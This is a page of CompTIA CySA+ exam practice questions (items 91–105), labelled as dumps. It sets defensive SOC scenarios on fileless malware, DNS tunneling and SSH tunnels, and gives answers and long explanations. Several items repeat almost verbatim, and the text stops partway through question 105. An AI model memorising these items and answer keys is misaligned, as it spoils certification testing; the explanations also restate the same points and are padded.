CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 7 Q91-105

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 91

A SOC analyst observes endpoints creating scheduled tasks that download scripts from untrusted external servers and execute them in memory. The scripts obfuscate their commands and attempt to disable antivirus services. What is the most likely threat, and what should the SOC do first?

A) Routine administrative automation; allow execution.
B) Fileless malware establishing persistence and evading detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; update configuration.
D) User testing; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative automation. Legitimate scripts are documented, signed, and predictable. Scripts that download external files, run entirely in memory, obfuscate commands, and disable antivirus software clearly indicate malicious activity. Ignoring this could allow malware to maintain persistence, execute lateral movement, and exfiltrate sensitive data.

Option B is correct. Fileless malware often uses scheduled tasks to establish persistence while avoiding detection by traditional endpoint security. Indicators include off-hours execution, obfuscation, memory-only execution, and antivirus disabling. Immediate response involves isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and examining scripts to understand malware behavior. Network traffic analysis helps identify command-and-control servers. Correlating findings with threat intelligence can provide additional context about attacker infrastructure. Remediation includes cleaning endpoints, restoring security services, updating detection rules, and monitoring other endpoints for similar behavior. Preserving forensic evidence ensures proper investigation, supports regulatory compliance, and improves threat detection.

Option C assumes misconfigured automation. Misconfigurations rarely involve obfuscation, memory-only execution, or disabling antivirus software. Treating this as benign could allow malware to persist undetected.

Option D assumes user testing. Legitimate testing is documented, predictable, and does not involve tampering with security services or executing untrusted scripts. Ignoring malicious activity could result in continued compromise.

Selecting option B ensures early detection, containment, and remediation of sophisticated malware while protecting endpoints and preserving evidence.

Question 92

A SOC analyst identifies multiple Linux endpoints sending repeated DNS queries to newly registered domains with high-entropy subdomains. The queries are low-volume but highly frequent and occur outside business hours. What is the most likely threat, and what is the recommended response?

A) Normal DNS resolution; allow traffic.
B) DNS tunneling used for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal DNS resolution. Standard DNS queries involve known domains and predictable subdomains. Frequent queries to newly registered domains with high-entropy, dynamically changing subdomains are anomalous and indicate potential malicious activity. Ignoring this could allow attackers to exfiltrate sensitive data covertly.

Option B is correct. DNS tunneling encodes information in DNS queries to bypass security controls and transmit data. Indicators include low-volume but frequent queries, newly registered domains, off-hours activity, and high-entropy subdomains. Immediate SOC response involves capturing DNS traffic for decoding, isolating affected hosts to prevent further exfiltration, and performing endpoint forensics to identify processes responsible. Analysts should correlate logs with threat intelligence to identify attacker infrastructure. Remediation involves cleaning infected endpoints, updating detection mechanisms for DNS tunneling patterns, and monitoring the environment for similar behavior. Preserving forensic evidence ensures effective incident investigation, regulatory compliance, and improved detection of covert threats.

Option C assumes misconfigured DNS servers. Misconfigurations usually result in failed resolutions or predictable errors, not persistent high-entropy queries to unknown domains. Treating this as benign could leave covert malware communications undetected.

Option D assumes antivirus telemetry. Telemetry typically targets known vendor domains and is predictable. Off-hours, frequent queries with high-entropy subdomains are inconsistent with legitimate telemetry activity.

Selecting option B ensures proactive detection, containment, and investigation of covert exfiltration methods while preserving evidence for analysis and future threat mitigation.

Question 93

A SOC analyst observes endpoints executing scripts that modify firewall rules to allow outbound connections to previously blocked IP addresses and disable logging. The scripts are obfuscated and run under elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass network defenses and exfiltrate data; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured security policies; update firewall rules.
D) User testing scripts; notify users.

Answer: B)

Explanation:

Option A assumes normal administrative activity. Legitimate scripts are predictable, documented, and signed. Scripts that obfuscate execution, disable logging, and modify firewall rules under elevated privileges indicate malicious behavior. Ignoring this could allow attackers to bypass security controls and maintain persistent access.

Option B is correct. Malware frequently modifies firewall rules to establish covert channels for command-and-control or data exfiltration. Indicators include off-hours execution, elevated privileges, log suppression, and obfuscation. Immediate SOC response involves isolating affected endpoints, capturing memory to analyze active processes and scripts, and reviewing network traffic to identify external connections. Analysts should correlate findings with threat intelligence to identify known malicious infrastructure. Remediation includes cleaning endpoints, restoring security and logging services, updating detection rules, and monitoring the environment for similar behavior. Preserving forensic evidence ensures accurate incident investigation, regulatory compliance, and improved detection of evasion techniques.

Option C assumes misconfigured security policies. Misconfigurations rarely involve obfuscation, elevated privileges, or log tampering. Treating this as benign could leave malware undetected.

Option D assumes user testing. Legitimate testing is predictable, documented, and does not involve disabling security services. Ignoring malicious activity risks persistent compromise.

Selecting option B ensures early containment, forensic investigation, and mitigation while protecting critical systems and preserving evidence for future threat prevention.

Question 94

A SOC analyst identifies endpoints repeatedly accessing rarely used network shares, reading portions of files, and attempting unauthorized writes outside business hours. Activity is observed across multiple systems simultaneously. What is the most likely threat, and what is the immediate response?

A) Normal backup activity; allow.
B) Malware performing reconnaissance or lateral movement; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.

Answer: B)

Explanation:

Option A assumes normal backup activity. Backups are predictable, involve full file access, and use known accounts. Accessing portions of rarely used network shares with unauthorized writes across multiple systems is anomalous. Ignoring this behavior risks lateral movement or reconnaissance by malware.

Option B is correct. Malware often performs lateral movement by probing network shares, attempting partial file access, and executing unauthorized writes to gather credentials or map resources. Immediate SOC response includes isolating affected endpoints to prevent further compromise, reviewing access logs to identify targeted files, and performing endpoint forensics to identify malware or scripts responsible. Analysts should correlate findings with SIEM logs to determine the scope of compromise and any additional impacted systems. Remediation involves cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures thorough investigation, supports regulatory compliance, and enhances threat detection for future incidents.

Option C assumes misconfigured scheduled tasks. Misconfigurations typically affect a limited scope and are predictable. Observed activity across multiple systems is inconsistent with misconfiguration alone.

Option D assumes legitimate off-hours activity. Users rarely access unused shares and attempt unauthorized writes simultaneously. Ignoring suspicious activity risks continued compromise and data exposure.

Selecting option B ensures early detection, containment, and remediation of malware performing reconnaissance or lateral movement, safeguarding sensitive data and maintaining network integrity.

Question 95

A SOC analyst observes Linux endpoints establishing outbound SSH connections on non-standard ports to unknown external IP addresses. Unusual processes are executed, and connections occur continuously outside business hours. What is the most likely threat, and what should the SOC do first?

A) Routine system administration; allow connections.
B) Malicious SSH tunnels used for command-and-control or data exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation scripts; update configuration.
D) Monitoring software; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal system administration. Routine SSH activity is predictable, occurs over known ports, and originates from known hosts. Continuous connections to unknown external IPs over non-standard ports with unusual processes indicate anomalous behavior. Ignoring this could allow attackers to maintain covert access or exfiltrate sensitive data.

Option B is correct. Malicious SSH tunnels are often used to bypass firewall restrictions and maintain covert command-and-control channels. Indicators include off-hours persistent connections, execution of unknown processes, and external IPs without a business relationship. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify responsible processes or malware. Analysts should correlate findings with threat intelligence to identify known malicious infrastructure. Remediation includes cleaning infected endpoints, updating firewall and monitoring controls, and scanning other endpoints for similar activity. Preserving forensic evidence ensures proper investigation, regulatory compliance, and improved detection.

Option C assumes misconfigured automation. Misconfigurations rarely produce persistent SSH connections to unknown external hosts. Treating this as benign could allow malware to persist.

Option D assumes monitoring software. Legitimate monitoring uses known servers and predictable ports. Off-hours continuous connections to unknown IPs are inconsistent with normal monitoring behavior.

Selecting option B ensures containment, forensic investigation, and remediation of covert malware activity while safeguarding sensitive data.

Question 96

A SOC analyst detects endpoints executing obfuscated PowerShell scripts that download additional payloads from external servers, disable antivirus services, and modify registry keys to maintain persistence. What is the most likely threat, and what should the SOC do first?

A) Routine administrative scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation scripts; correct configuration.
D) User testing scripts; notify users.

Answer: B)

Explanation:

Option A assumes normal administrative scripts. Legitimate administrative activity is typically signed, predictable, and documented. Obfuscated scripts that download payloads, disable antivirus software, and modify registry keys clearly indicate malicious behavior. Ignoring this could allow persistent compromise, lateral movement, and potential data exfiltration.

Option B is correct. Fileless malware often uses PowerShell to execute entirely in memory, bypassing traditional security controls. Key indicators include off-hours execution, obfuscation, registry modifications for persistence, antivirus service disruption, and outbound connections to unknown servers. Immediate SOC response involves isolating affected endpoints, capturing memory for forensic analysis, and examining scripts to understand malware functionality and intent. Network traffic analysis can identify command-and-control servers, and correlating logs with threat intelligence helps determine attacker infrastructure. Remediation includes cleaning infected endpoints, restoring security services, updating detection signatures, and monitoring for similar activity. Preserving forensic evidence ensures accurate post-incident investigation, regulatory compliance, and improvement of detection mechanisms.

Option C assumes misconfigured automation scripts. Misconfigurations rarely result in obfuscation, registry changes, or antivirus disabling. Treating this as benign could allow malware persistence.

Option D assumes user testing. Legitimate testing is documented and predictable, without tampering with security controls. Ignoring malicious activity risks continued compromise.

Selecting option B ensures early detection, containment, and forensic investigation while protecting critical systems.

Question 97

A SOC analyst observes Linux endpoints sending persistent, low-volume traffic over non-standard TCP ports to external IPs outside business hours. Traffic is encrypted and not flagged by IDS. What is the most likely threat, and what should the SOC do first?

A) Routine system updates; allow traffic.
B) Malware establishes covert command-and-control channels; isolates endpoints, captures network traffic, and analyzes processes.
C) Misconfigured network services; update configuration.
D) Legitimate cloud synchronization; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal system updates. Updates typically occur over known ports to verified vendor servers and are predictable. Low-volume, persistent, encrypted traffic over unusual ports to unknown IPs is inconsistent with routine updates. Ignoring this could allow attackers to maintain covert access, move laterally, or exfiltrate sensitive data.

Option B is correct. Malware frequently uses non-standard ports and encryption to bypass detection while maintaining command-and-control. Indicators include off-hours traffic, persistent low-volume communication, and external IPs outside the business scope. Immediate SOC response involves isolating endpoints to prevent further compromise, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify responsible processes. Threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning infected endpoints, updating firewall and detection rules, and monitoring other systems. Preserving forensic evidence ensures proper investigation, regulatory compliance, and improved detection capabilities.

Option C assumes misconfigured network services. Misconfigurations usually cause failed connections or errors, not persistent encrypted traffic to unknown hosts. Treating this as benign could leave malware undetected.

Option D assumes legitimate cloud synchronization. Cloud services are predictable, use known domains, and standard ports. Observed behavior is inconsistent with normal operations.

Selecting option B ensures containment, forensic analysis, and mitigation of covert malware while protecting sensitive data.

Question 98

A SOC analyst identifies endpoints repeatedly querying newly registered domains with high-entropy subdomains over DNS. Queries are low-volume but highly frequent and occur off-hours. What is the most likely threat, and what is the recommended response?

A) Normal DNS resolution; allow traffic.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal DNS resolution. Standard queries involve known domains with predictable subdomains. Persistent queries to new domains with high-entropy, dynamically changing subdomains are anomalous and indicate potential malicious activity. Allowing this could enable covert data exfiltration.

Option B is correct. DNS tunneling encodes data in DNS queries to bypass network controls. Indicators include off-hours activity, high-frequency queries, and newly registered domains with high-entropy subdomains. Immediate SOC response involves capturing DNS traffic for decoding, isolating affected hosts to prevent exfiltration, and performing endpoint forensics to identify responsible processes. Correlating with SIEM logs and threat intelligence helps identify attacker infrastructure. Remediation involves cleaning endpoints, updating detection rules, and monitoring for similar activity. Preserving evidence ensures accurate investigation, regulatory compliance, and improved threat detection.

Option C assumes misconfigured DNS servers. Misconfigurations result in failed resolutions or predictable errors, not frequent high-entropy queries. Treating this as benign could leave covert malware undetected.

Option D assumes antivirus telemetry. Telemetry targets known domains and is predictable. Off-hours high-frequency queries with high-entropy subdomains are inconsistent with legitimate telemetry activity.

Selecting option B ensures proactive detection, containment, and investigation of covert exfiltration methods while preserving evidence.

Question 99

A SOC analyst observes endpoints accessing rarely used network shares, reading portions of files, and attempting unauthorized writes during off-hours. Activity occurs across multiple systems. What is the most likely threat, and what should the SOC do first?

A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.

Answer: B)

Explanation:

Option A assumes normal backup activity. Backups involve full file access, predictable schedules, and known accounts. Accessing portions of rarely used shares with unauthorized writes across multiple systems is anomalous. Ignoring this risks lateral movement or reconnaissance by malware.

Option B is correct. Malware often probes network shares to map resources, attempt credential access, and propagate laterally. Indicators include off-hours access, partial file reads, unauthorized writes, and multi-system activity. Immediate SOC response includes isolating affected endpoints, reviewing access logs to determine targeted files, and performing endpoint forensics to identify malware or scripts. Correlation with SIEM logs helps assess the scope and identify additional affected systems. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving evidence ensures thorough investigation, supports regulatory compliance, and improves threat detection for future incidents.

Option C assumes misconfigured scheduled tasks. Misconfigurations usually affect a limited scope and are predictable. Observed multi-system off-hour activity is inconsistent with misconfiguration.

Option D assumes that off-hours activity on a network is legitimate, suggesting that users accessing rarely used shares or performing writes outside normal hours can be considered benign. While some automated processes, maintenance tasks, or scheduled backups do occur off-hours, typical user behavior rarely includes simultaneous access to infrequently used resources combined with unauthorized write attempts. Such activity is anomalous and may indicate malicious behavior rather than routine operations.

Attackers and malware often exploit off-hours periods when monitoring is reduced, using the window to perform reconnaissance, move laterally, or exfiltrate data. Accessing unused shares and attempting unauthorized writes simultaneously is consistent with these tactics, as adversaries seek sensitive resources while avoiding detection. Assuming this activity is normal without verification risks allows malicious actors to maintain persistence, escalate privileges, or compromise additional systems.

Proper response requires investigation of off-hours anomalies, including reviewing access logs, correlating activity with known schedules, and assessing permissions. Behavioral baselines can help distinguish legitimate operations from suspicious actions. Ignoring unusual off-hours access increases the likelihood of continued compromise and data exposure. Verification and timely remediation are critical to ensuring network security and preventing attackers from exploiting gaps in monitoring or operational assumptions.

Selecting option B ensures early detection, containment, and remediation of malware performing reconnaissance or lateral movement.

Question 100

A SOC analyst observes Linux endpoints establishing outbound SSH connections over non-standard ports to unknown external IPs. Unusual processes are executed, and connections persist outside business hours. What is the most likely threat, and what is the immediate response?

A) Routine system administration; allow connections.
B) Malicious SSH tunnels for command-and-control or data exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation scripts; update configuration.
D) Monitoring software; verify with vendor.

Answer: B)

Explanation:

Option A assumes routine administration. Normal SSH connections are predictable, use standard ports, and originate from known hosts. Continuous connections to unknown IPs with unusual processes indicate anomalous activity. Ignoring this could allow attackers to maintain covert access or exfiltrate data.

Option B is correct. Malicious SSH tunnels often bypass firewall rules to maintain command-and-control channels or exfiltrate data. Indicators include off-hours persistent connections, execution of unknown processes, and communication with unknown IPs. Immediate SOC response involves isolating affected endpoints, capturing network traffic to analyze communications, and performing endpoint forensics to identify malware or scripts responsible. Correlating findings with threat intelligence can reveal attacker infrastructure. Remediation includes cleaning endpoints, updating firewall and monitoring controls, and scanning other endpoints. Preserving forensic evidence ensures proper investigation and improved detection.

Option C posits that unusual network activity—specifically persistent SSH connections to unknown external hosts—could be the result of misconfigured automation. Automation scripts and scheduled tasks are common in enterprise environments, designed to streamline repetitive operations, maintain system configurations, and perform regular maintenance or monitoring. When misconfigured, these scripts may produce errors, fail to execute, or generate internal network traffic that is somewhat unusual but generally predictable. For instance, a misconfigured backup script might repeatedly attempt to reach an internal storage server, or a maintenance task might produce error logs when dependencies are missing. These behaviors are typically traceable and confined to authorized systems or predictable endpoints, allowing administrators to identify and remediate the issue without major disruption.

Persistent SSH connections to unknown external hosts, however, are highly inconsistent with the expected behavior of misconfigured automation. Automation scripts rarely, if ever, create sustained, long-term connections to external IP addresses that are unknown or unapproved. Such activity is more characteristic of deliberate, unauthorized operations, such as malware establishing a command-and-control channel or an attacker maintaining covert access. SSH connections are particularly significant because they provide full command-line access to a system, enabling remote execution, data exfiltration, and lateral movement. A persistent connection suggests that an entity is intentionally maintaining access over time rather than producing accidental or transient errors caused by misconfiguration.

Treating these connections as benign can introduce significant security risks. Assuming that persistent external SSH activity is the result of a simple script misconfiguration could allow malware or an attacker to remain undetected on the network. This persistence enables ongoing exploitation, potentially allowing sensitive data to be exfiltrated, systems to be used for lateral movement, or additional malware to be deployed. Unlike misconfigured automation, which typically produces observable errors and predictable patterns, malicious activity is deliberate, stealthy, and designed to evade monitoring and forensic detection. Malware may also employ obfuscation, use non-standard ports, or clear logs to conceal its presence, further differentiating it from routine automation errors.

Proper security response requires verification and investigation rather than assumption. Administrators should analyze endpoint behavior, inspect SSH sessions, and correlate network traffic with known configurations and authorized systems. Forensic investigation, including memory analysis and process inspection, may be necessary to identify unauthorized activity. Understanding the source, purpose, and legitimacy of persistent connections is critical to determining whether they are part of routine operations or a potential compromise.

While misconfigured automation can generate network anomalies, persistent SSH connections to unknown external hosts are highly unlikely to be benign. Such behavior strongly suggests malicious activity, and treating it as a routine misconfiguration risks leaving malware operational, allowing continued persistence, data exfiltration, and potential lateral movement. Accurate verification and timely remediation are essential to identify unauthorized activity, secure the network, and prevent ongoing compromise.

Option D assumes monitoring software. Legitimate monitoring uses known servers and predictable ports. Off-hours, persistent connections to unknown IPs are inconsistent with normal monitoring.

Selecting option B ensures containment, forensic analysis, and remediation of covert malware activity while safeguarding sensitive data.

Question 101

A SOC analyst notices endpoints executing scripts that disable logging services, modify firewall rules, and connect to untrusted external IPs. The scripts are obfuscated and run with elevated privileges. What is the most likely threat, and what should the SOC do first?

A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass defenses and exfiltrate data; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured firewall rules; update configuration.
D) User testing scripts; notify users.

Answer: B)

Explanation:

Option A assumes normal administrative scripts. Legitimate administrative activity is typically predictable, documented, and often signed to ensure authenticity. Administrative scripts rarely attempt to bypass logging mechanisms, modify firewall rules arbitrarily, or execute obfuscated code under elevated privileges. Treating this behavior as normal could allow persistent malware to maintain covert access, exfiltrate sensitive data, or propagate laterally across the network. Administrative routines are scheduled, follow strict IT operational procedures, and usually produce auditable logs. Ignoring anomalous behavior under the assumption of legitimate administrative activity could lead to a full-scale compromise, where attackers establish persistent command-and-control channels and evade detection systems, increasing the organization’s exposure to breaches and regulatory violations.

Option B is correct. Malware often leverages obfuscated scripts and elevated privileges to manipulate endpoint configurations, bypass security controls, and establish covert communication with external infrastructure. Disabling logging services prevents alerts from being generated, while modifying firewall rules allows outbound communication that would normally be blocked, facilitating exfiltration of sensitive data or persistent command-and-control channels. Immediate SOC response should include isolating affected endpoints to prevent further compromise and lateral movement. Memory capture is crucial for analyzing in-memory execution, as many modern threats operate without leaving artifacts on disk. Analysts should perform deep script analysis to understand malware behavior, determine persistence mechanisms, and identify external endpoints being contacted. Network traffic monitoring and correlation with threat intelligence can reveal the scope and sophistication of the attack, including identifying other potentially compromised endpoints. Remediation steps involve cleaning infected systems, restoring logging and firewall rules, updating detection signatures to recognize similar threats in the future, and continuous monitoring for signs of recurring malicious activity. Evidence preservation is essential for forensic investigations, regulatory compliance, and supporting potential legal action against the perpetrators. The key reason this approach is necessary is that sophisticated malware is designed to evade traditional detection, and failing to isolate and analyze endpoints immediately could allow attackers to maintain long-term access, compromise additional systems, and extract highly sensitive data.

Option C assumes misconfigured firewall rules. Misconfigurations may unintentionally block or allow traffic, but they rarely include obfuscation, script execution, elevated privileges, and simultaneous disabling of logging services. Treating this behavior as benign based on an assumption of misconfiguration may result in delayed detection of a highly sophisticated threat, allowing malware to remain undetected while performing reconnaissance, lateral movement, and data exfiltration. Misconfigurations do not typically execute code that attempts to bypass security mechanisms intentionally, and they are generally documented and traceable within IT change management systems.

Option D assumes user testing. Legitimate user testing is usually documented and predictable and rarely involves elevated privileges, obfuscation, or the manipulation of security controls such as logging services and firewall rules. Ignoring suspicious activity under the assumption of testing could result in undetected malware operating within the environment. Malicious actors often mimic user behavior to evade detection, and misclassifying anomalous scripts as testing could lead to extended periods of exposure, allowing attackers to perform reconnaissance, gather credentials, and exfiltrate data.

Selecting option B ensures that the SOC immediately addresses the threat by isolating affected endpoints, capturing in-memory evidence for forensic analysis, analyzing the obfuscated scripts, and understanding the methods the malware uses to maintain persistence and communicate with external infrastructure. This approach allows the organization to contain the attack, remediate infected systems, update detection mechanisms, and prevent similar attacks in the future. It balances the need for immediate containment with thorough forensic analysis to ensure comprehensive mitigation while protecting sensitive information, maintaining network integrity, and meeting regulatory requirements. The analysis of all four choices shows that only considering the activity as malware and responding accordingly provides the proactive and systematic steps required to prevent escalation, reduce risk, and strengthen the overall security posture.

Question 102

A SOC analyst identifies endpoints generating repeated HTTPS requests to newly registered domains with dynamically generated subdomains. The requests are low-volume, highly frequent, occur off-hours, and are initiated by scripts not documented in IT operations. What is the most likely threat, and what should the SOC do first?

A) Normal application telemetry; allow.
B) Malware using newly registered domains for command-and-control; capture traffic, isolate endpoints, and analyze scripts.
C) Misconfigured web services; update configuration.
D) Legitimate cloud service testing; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal telemetry. Telemetry typically involves predictable, documented domains, follows a known schedule, and produces auditable logs. Persistent low-volume HTTPS requests to newly registered domains with dynamically generated subdomains are anomalous and inconsistent with normal telemetry. Ignoring this behavior could allow malware to maintain covert command-and-control channels or exfiltrate data, remaining undetected due to low traffic volumes. Normal telemetry is usually designed to ensure endpoint and application health rather than facilitate unauthorized external communications.

Option B is correct. Malware frequently uses dynamically generated subdomains on newly registered domains to avoid detection by reputation-based security systems. The off-hours timing, low-volume but highly frequent requests, and undocumented script execution all indicate malicious activity. Immediate SOC response should involve capturing network traffic to analyze the destinations, isolating affected endpoints to prevent further command-and-control communications, and analyzing the responsible scripts to understand the malware’s operation. Correlating network logs with threat intelligence can identify associated attacker infrastructure. Remediation includes cleaning infected systems, updating detection rules for dynamically generated domain patterns, monitoring other systems for similar behaviors, and preserving forensic evidence for regulatory compliance and incident analysis. Neglecting to treat this as malicious could allow persistent malware operations, lateral movement, and sensitive data exfiltration.

Option C assumes misconfigured web services. Misconfigurations are predictable, documented, and generally limited in scope. They rarely cause low-volume, persistent, off-hours HTTPS requests to unknown domains, and assuming misconfiguration could allow attackers to maintain covert access undetected. Misconfiguration alone would not explain the use of dynamically generated subdomains or scripts executing off-hours.

Option D assumes legitimate cloud service testing. Testing is scheduled, documented, and predictable, and usually communicates with known vendor domains. Observed activity is inconsistent with standard testing procedures. Ignoring this as cloud testing could result in prolonged malware activity, increasing the risk of data loss or system compromise.

Selecting option B ensures proper containment, forensic analysis, and remediation of malware infrastructure. It addresses immediate threats, preserves evidence, and enables preventive measures to protect sensitive systems and data. The systematic analysis of all four possibilities demonstrates that only considering this activity as malicious allows for a comprehensive response, balancing containment, investigation, and remediation while strengthening organizational defenses against advanced persistent threats.

Question 103

A SOC analyst observes endpoints sending repeated DNS queries to high-entropy subdomains of newly registered domains. Queries are low-volume but occur frequently outside business hours. What is the most likely threat, and what is the recommended response?

A) Normal DNS resolution; allow traffic.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.

Answer: B)

Explanation:

Option A assumes normal DNS resolution. Standard DNS traffic resolves known domains with predictable subdomain patterns. Persistent queries to newly registered domains with high-entropy subdomains are highly anomalous. Allowing this activity could enable covert malware communications or data exfiltration. Normal DNS operations are designed to provide legitimate name resolution and typically produce predictable query patterns that correlate with operational needs. Ignoring suspicious queries exposes the organization to persistent threats that may bypass standard monitoring.

Option B is correct. DNS tunneling allows attackers to encode and transmit data within DNS queries, bypassing network controls. Indicators include frequent off-hours queries, high-entropy dynamically generated subdomains, and queries targeting newly registered domains. Immediate SOC response involves capturing DNS traffic for analysis, isolating affected hosts to prevent further exfiltration, and performing endpoint forensics to identify the malicious processes responsible. Analysts should correlate DNS traffic with logs and threat intelligence to identify external attacker infrastructure. Remediation includes cleaning affected systems, updating detection rules for DNS tunneling, and continuous monitoring for similar patterns. Preserving forensic evidence ensures regulatory compliance and effective incident analysis. Neglecting to respond could allow attackers to maintain covert operations for extended periods, potentially compromising sensitive data.

Option C assumes misconfigured DNS servers. Misconfigurations typically generate predictable failures, not low-volume, high-frequency queries with high-entropy subdomains. Treating this as benign would leave covert malware undetected, allowing continued exfiltration or reconnaissance.

Option D assumes antivirus telemetry. Legitimate telemetry occurs to known domains and follows a documented schedule. Off-hours high-entropy queries are inconsistent with standard antivirus operations. Misclassifying this behavior risks extended compromise.

Selecting option B ensures containment, investigation, and remediation of covert malware activity while protecting sensitive data and maintaining network integrity. It balances immediate response with thorough analysis, preserving evidence and improving detection capabilities.

Question 104

A SOC analyst detects Linux endpoints repeatedly connecting over non-standard SSH ports to unknown external IPs. These connections occur outside business hours and are associated with unexpected processes executing in the background. What is the most likely threat, and what should the SOC do first?

A) Routine system administration; allow connections.
B) Malicious SSH tunnels for command-and-control or data exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation scripts; update configuration.
D) Monitoring software; verify with vendor.

Answer: B)

Explanation:

Option A assumes routine system administration. Normal SSH activity is predictable, typically occurs over standard ports (port 22), and involves known internal or vendor hosts. Continuous connections to unknown external IPs over non-standard ports, executed by unexpected processes, are highly anomalous. Assuming this is legitimate could allow attackers to establish covert channels, move laterally, and exfiltrate sensitive information. System administrators generally follow documented procedures and maintain logs. Deviations from these norms, especially persistent off-hours activity, indicate potential compromise. Ignoring such behavior under the assumption of routine administration exposes the organization to extended threat persistence, where attackers can quietly collect credentials, monitor traffic, and prepare for future exploitation.

Option B is correct. Malicious SSH tunnels are often employed by attackers to bypass firewall rules, encrypt communications, and maintain command-and-control channels or exfiltrate sensitive data. Indicators include off-hours persistent connections, execution of unknown processes, non-standard ports, and communication with external IPs that have no business relevance. Immediate SOC response involves isolating the affected endpoints to prevent further compromise or lateral movement. Network traffic should be captured and analyzed to identify command-and-control infrastructure, communication patterns, and potential exfiltrated data. Endpoint forensics is critical to identify processes responsible for the activity and understand malware functionality. Threat intelligence can provide information about known attacker infrastructure, including IP addresses, domains, or malware signatures. Remediation includes cleaning infected endpoints, updating firewall rules to restrict unauthorized outbound traffic, applying detection rules to recognize similar SSH tunneling patterns, and monitoring other endpoints for comparable suspicious activity. Preserving forensic evidence is essential for regulatory compliance, incident reporting, and future threat hunting.

Option C assumes misconfigured automation scripts. Misconfigurations typically affect a limited scope and are predictable. They rarely result in persistent outbound SSH connections to unknown external hosts associated with unexpected processes. Treating this as benign could allow attackers to maintain covert channels undetected, enabling them to execute further attacks, exfiltrate sensitive data, or pivot to other systems. Misconfigured scripts may fail or generate error logs, making detection straightforward, unlike sophisticated malicious activity designed to blend with normal system behavior.

Option D assumes monitoring software. Legitimate monitoring tools communicate with known vendor servers over predictable ports. Persistent off-hours connections to unknown external IPs, associated with unexpected background processes, are inconsistent with normal monitoring behavior. Ignoring this activity under the assumption of monitoring could leave attackers in control of endpoints, potentially undermining the network’s security posture. Sophisticated attackers often mimic legitimate monitoring patterns to evade detection, making careful analysis essential.

Selecting option B ensures the SOC addresses the threat appropriately by combining immediate containment, forensic analysis, and remediation. Isolating endpoints prevents lateral movement and further compromise, while analyzing traffic and processes identifies malware behavior and command-and-control infrastructure. This approach balances rapid response with thorough investigation, preserves evidence, and enhances future detection and mitigation capabilities. By considering all four scenarios, it is clear that only treating the activity as malicious allows a structured and effective response that protects sensitive data, maintains system integrity, and strengthens organizational security posture against advanced persistent threats.

Question 105

A SOC analyst observes Windows endpoints executing obfuscated PowerShell scripts that download additional payloads from external servers, modify registry keys for persistence, and attempt to disable antivirus services. Activity occurs outside business hours, and multiple endpoints are affected. What is the most likely threat, and what is the immediate SOC response?

A) Routine administrative PowerShell scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; correct configuration.
D) User testing scripts; notify users.

Answer: B)

Explanation:

Option A assumes routine administrative PowerShell scripts. Legitimate administrative scripts are typically signed, predictable, documented, and executed by authorized users. Scripts that are obfuscated, download payloads from untrusted servers, modify registry keys to maintain persistence, and attempt to disable antivirus services are clearly indicative of malicious activity. Ignoring such scripts under the assumption of administrative activity could allow attackers to maintain covert access, exfiltrate sensitive information, and propagate laterally across the network. Administrative activity generally produces logs, follows predictable schedules, and is auditable, whereas the described behavior deviates from these norms, particularly given that multiple endpoints are affected off-hours.

Option B is correct. Fileless malware often utilizes PowerShell to execute directly in memory, avoiding disk-based detection mechanisms. It can establish persistence through registry modifications, disable antivirus services to prevent detection, and download additional payloads for further compromise. Immediate SOC response should involve isolating affected endpoints to prevent lateral movement and further compromise. Memory capture is critical for analyzing in-memory execution and identifying malicious code. Script analysis is necessary to understand the malware’s functionality, persistence mechanisms, and command-and-control communication methods. Network traffic should be monitored to identify external servers receiving data or issuing commands, while correlation with threat intelligence helps identify known malicious infrastructure. Remediation includes cleaning infected endpoints, restoring security and logging services, updating detection rules to recognize similar activity, and monitoring the network for other potentially compromised systems. Preserving forensic evidence ensures proper investigation, supports regulatory compliance, and enables post-incident threat analysis. Neglecting to respond effectively could allow persistent malware operations, extended compromise, and exfiltration of highly sensitive data.

Option C assumes misconfigured automation tasks. Misconfigurations are generally predictable, limited in scope, and documented. They rarely result in obfuscated script execution, registry modification for persistence, or antivirus service tampering. Treating this as benign could allow malware to persist undetected, bypass security controls, and compromise additional endpoints. Misconfigurations would typically result in visible errors or logs, unlike the described malicious behavior.

